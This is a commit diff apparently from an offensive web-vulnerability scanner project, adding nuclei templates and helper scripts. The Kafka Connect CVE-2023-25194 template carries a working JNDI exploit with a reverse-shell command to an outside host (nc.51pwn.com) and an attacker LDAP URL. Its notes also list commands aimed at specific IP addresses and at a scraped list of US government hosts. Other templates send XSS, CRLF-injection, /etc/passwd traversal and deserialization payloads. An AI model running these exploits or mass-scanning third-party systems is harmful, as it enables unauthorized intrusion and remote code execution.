add config/51pwn/CVE-2023-25194.yaml 2023-02-23

Author: hktalent

.gitmodules

@@ -10,3 +10,9 @@
 [submodule "tools/ProxyShell"]
 	path = tools/ProxyShell
 	url = https://github.com/ktecv2000/ProxyShell.git
+[submodule "config/smuggler"]
+	path = config/smuggler
+	url = https://github.com/defparam/smuggler.git
+[submodule "tools/The-Hacker-Recipes"]
+	path = tools/The-Hacker-Recipes
+	url = https://github.com/ShutdownRepo/The-Hacker-Recipes.git

README_CN.md

@@ -278,9 +278,14 @@ https://github.com/heartshare/go-wafw00f
 
 git submodule add --force  https://github.com/projectdiscovery/fuzzing-templates.git config/fuzzing-templates
 git submodule add --force  https://github.com/projectdiscovery/nuclei-templates.git config/nuclei-templates
+git submodule add --force  https://github.com/defparam/smuggler.git config/smuggler
 git submodule update --init --recursive
 /usr/bin/git -c protocol.version=2 submodule update --init --force --recursive
 /usr/bin/git -c protocol.version=2 submodule update --remote --force --recursive
 
 git submodule  update --init --recursive --remote
--->
+
+
+cat us_gov_ksubdomain.txt|sed 's/=.*$//g'|sort -u|./tools/macOS/httpx -silent -http2 -nc -p 80,443 -t 60 -json -o us_gov_httpx.json
+
+-->

brute/dicts/filedic.txt

@@ -7053,6 +7053,7 @@ $metadata
 /examples/index.html
 /examples/jsp/index.html
 /examples/jsp/jsp2/misc/config.jsp
+/;param=value/examples/jsp/snp/snoop.jsp
 /examples/jsp/snp/snoop.jsp
 /examples/jsp/source.jsp
 /examples/servlet/HelloWorldExample

config/51pwn/CVE-2019-0221.yaml

@@ -0,0 +1,46 @@
+id: CVE-2019-0221
+
+info:
+  name: Apache Tomcat - Cross-Site Scripting
+  author: pikpikcu
+  severity: medium
+  description: |
+    Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.
+  reference:
+    - https://seclists.org/fulldisclosure/2019/May/50
+    - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
+    - https://www.exploit-db.com/exploits/50119
+    - https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-0221
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2019-0221
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: title:"Apache Tomcat"
+  tags: apache,xss,tomcat,seclists,edb,cve,cve2019
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
+      - "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "<script>alert('xss')</script>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/11

config/51pwn/CVE-2020-9484.yaml

@@ -0,0 +1,49 @@
+id: CVE-2020-9484
+
+info:
+  name: Apache Tomcat Remote Command Execution
+  author: dwisiswant0
+  severity: high
+  description: |
+    When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if
+    a) an attacker is able to control the contents and name of a file on the server; and
+    b) the server is configured to use the PersistenceManager with a FileStore; and
+    c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and
+    d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control.
+    Note that all of conditions a) to d) must be true for the attack to succeed.
+  reference:
+    - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9484
+    - https://lists.apache.org/thread.html/r77eae567ed829da9012cadb29af17f2df8fa23bf66faf88229857bb1%40%3Cannounce.tomcat.apache.org%3E
+    - https://lists.apache.org/thread.html/rf70f53af27e04869bdac18b1fc14a3ee529e59eb12292c8791a77926@%3Cusers.tomcat.apache.org%3E
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7
+    cve-id: CVE-2020-9484
+    cwe-id: CWE-502
+  metadata:
+    shodan-query: title:"Apache Tomcat"
+  tags: rce,packetstorm,cve,cve2020,apache,tomcat
+
+requests:
+  - method: GET
+    headers:
+      Cookie: "JSESSIONID=../../../../../usr/local/tomcat/groovy"
+    path:
+      - "{{BaseURL}}/index.jsp"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 500
+
+      - type: word
+        part: body
+        words:
+          - "Exception"
+          - "ObjectInputStream"
+          - "PersistentManagerBase"
+        condition: and
+
+# Enhanced by mp on 2022/04/04

config/51pwn/CVE-2023-25194.yaml

@@ -0,0 +1,94 @@
+id: CVE-2023-25194_51pwn
+
+info:
+  name: CVE-2023-25194_51pwn
+  author: 51pwn
+  severity: critical
+  description: |
+    Kafka Connect RCE via connector SASL JAAS JndiLoginModule configuration
+
+    http.title:"UI for Apache Kafka"
+    
+    java -jar RogueJndi-1.1.jar --hostname 127.0.0.1 --ldapPort 1389 --httpPort 8000 -c "bash -c bash\${IFS}-i\${IFS}>&/dev/tcp/nc.51pwn.com/9999<&1"
+    Starting RMI registry on port 1097
+    Starting HTTP server on 0.0.0.0:8000
+    Starting LDAP server on 0.0.0.0:1389
+    Mapping ldap://127.0.0.1:1389/o=commons-collections7 to artsploit.controllers.CommonsCollections7
+    Mapping ldap://127.0.0.1:1389/o=dummy to artsploit.controllers.Dummy
+    Mapping ldap://127.0.0.1:1389/ to artsploit.controllers.RemoteReference
+    Mapping ldap://127.0.0.1:1389/o=reference to artsploit.controllers.RemoteReference
+    Mapping ldap://127.0.0.1:1389/o=scala-enable-unsafe-commons-deser to artsploit.controllers.Scala
+
+    nc -nlvp 9999
+    nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -debug -u  http://176.79.33.152:7001
+    nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -debug -u http://135.181.39.55:8123
+    cat atckData/us_gov_httpx.json|jq '.url'|sed 's/"//g'|nuclei -duc -t $PWD/config/51pwn/CVE-2023-25194.yaml -v
+  reference:
+    - https://hackerone.com/reports/1529790
+    - https://github.com/ohnonoyesyes/CVE-2023-25194
+    - https://www.oschina.net/news/228187
+    - https://51pwn.com
+  tags: web,cve,2023
+
+requests:
+  - raw:
+      - |+
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |+
+        POST /connectors HTTP/1.1
+        Host: {{Hostname}}
+        Cache-Control: max-age=0
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+        Content-Type: application/json
+        Connection: close
+
+        {"name": "test", 
+          "config":
+            {
+                "connector.class":"io.debezium.connector.mysql.MySqlConnector",
+              "database.hostname": "xxxxx",
+              "database.port": "3306",
+              "database.user": "root",
+              "database.password": "xxxxxx",
+              "database.dbname": "xxxx",
+              "database.sslmode": "SSL_MODE",
+                "database.server.id": "1234",
+              "database.server.name": "localhost",
+                "table.include.list": "MYSQL_TABLES",
+              "tasks.max":"1",
+                "topic.prefix": "aaa22",
+                "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
+                "schema.history.internal.kafka.topic": "aaa22",
+                "schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
+              "database.history.producer.security.protocol": "SASL_SSL",
+              "database.history.producer.sasl.mechanism": "PLAIN",
+              "database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://poc.51pwn.com:1389\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxxx\";"
+            }
+        }
+
+      # end
+    unsafe: true
+    cookie-reuse: true
+    req-condition: true
+    matchers-condition: and
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        condition: and
+        dsl:
+          - status_code_1==200
+          - contains(body_1,"UI for Apache Kafka")
+          - status_code_2==201
+      # - type: word
+      #   part: body
+      #   words:
+      #     - ".springframework."
+      #     - ".kafka.ui."
+      #     - "org.springframework.security.web.server.context."
+      #   condition: and

config/51pwn/Path_traversal_NodeJs.yaml

@@ -0,0 +1,47 @@
+id: Path_traversal_NodeJs
+
+info:
+  name: Path_traversal_NodeJs
+  author: 51pwn
+  severity: critical
+  reference:
+    - https://hackerone.com/reports/358112
+    - https://51pwn.com
+  tags: pathtraversal,nodejs,pts
+
+requests:
+  - raw:
+      - |+
+        GET /a.markdown/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Pragma:no-cache
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+      - |+
+        GET /../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Pragma:no-cache
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+      - |+
+        GET /test.php/ HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Pragma:no-cache
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+      # end payload
+    unsafe: true
+    pipeline: true
+    pipeline-concurrent-connections: 40
+    pipeline-requests-per-connection: 25000
+    cookie-reuse: true
+    req-condition: true
+    matchers-condition: and
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'not a directory'
+          - 'root:'
+        condition: or

config/51pwn/XSS_CRLF_Injection.yaml

@@ -0,0 +1,47 @@
+id: XSS_CRLF_Injection
+
+info:
+  name: XSS_CRLF_Injection
+  author: 51pwn
+  severity: critical
+  reference:
+    - https://hackerone.com/reports/192749
+    - https://51pwn.com
+  tags: xss,crlf,injection
+
+requests:
+  - raw:
+      - |+
+        GET /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Pragma:no-cache
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+        
+      - |+
+        GET /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e HTTP/1.1
+        Host: {{Hostname}}
+        Accept:*/*
+        Connection: keep-alive
+        Pragma:no-cache
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 0
+        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+        
+      # end payload
+    unsafe: true
+    pipeline: true
+    pipeline-concurrent-connections: 40
+    pipeline-requests-per-connection: 25000
+    cookie-reuse: true
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '<svg onload=alert(document.domain)>'
+        condition: and

config/51pwn/spring_cloud_gateway_CVE_2022_22947.yaml

@@ -82,6 +82,8 @@ requests:
       - type: regex
         regex:
           - '(uid=[^\n\\]+)'
+          - '(gid=[^\n\\]+)'
+        condition: and
     extractors:
       - type: regex
         part: body

config/config.json

@@ -11,8 +11,7 @@
       "dir",
       "-u",
       "",
-      "-H",
-      "'Cookie: JSESSIONID=353170776e;rememberMe=123'",
+      "-H", "'Cookie: JSESSIONID=353170776e;rememberMe=123'",
       "--no-status",
       "-k",
       "--random-agent",

config/doKsubdomain.sh

@@ -0,0 +1,11 @@
+#!/bin/bash
+function doMasScan {
+    if [[ -f $1 ]] ; then
+        echo $PPSSWWDD| sudo -S ksubdomain enum -b 5M --dl $1  -f $HOME/MyWork/scan4all/config/database/subdomain.txt -o $HOME/MyWork/scan4all/atckData/$2
+    else
+        echo $PPSSWWDD| sudo -S ksubdomain enum -b 5M -d $1  -f $HOME/MyWork/scan4all/config/database/subdomain.txt -o $HOME/MyWork/scan4all/atckData/$2
+    fi
+}
+doMasScan $1 $2
+
+

config/smuggler

@@ -36,7 +36,7 @@ import (
 var Config embed.FS
 
 // 多个web cve 检测
-func main() {
+func main1() {
 	util.DoInit(&Config)
 	for _, cbk := range []func(string) bool{
 		ruby.DoCheck,

cveMain.go

@@ -1,18 +1,22 @@
 package main
 
 import (
+	"github.com/hktalent/ProScan4all/lib/Smuggling"
 	"github.com/hktalent/ProScan4all/lib/util"
-	"reflect"
+	"os"
 	"testing"
 )
 
 func TestGetIp(t *testing.T) {
+	os.Setenv("CacheName", "TmpXx1")
 	util.DoInit(nil)
-	t.Run("获取当前用户的ip", func(t *testing.T) {
-		if got := util.GetIp(); !reflect.DeepEqual(got, "") {
-			t.Errorf("GetIp() = %v, want %v", got, "")
-		}
-	})
+	//t.Run("获取当前用户的ip", func(t *testing.T) {
+	//	if got := util.GetIp(); !reflect.DeepEqual(got, "") {
+	//		t.Errorf("GetIp() = %v, want %v", got, "")
+	//	}
+	//})
+
+	Smuggling.DoCheckSmuggling("http://127.0.0.1/", "")
 	util.Wg.Wait()
 	util.CloseAll()
 }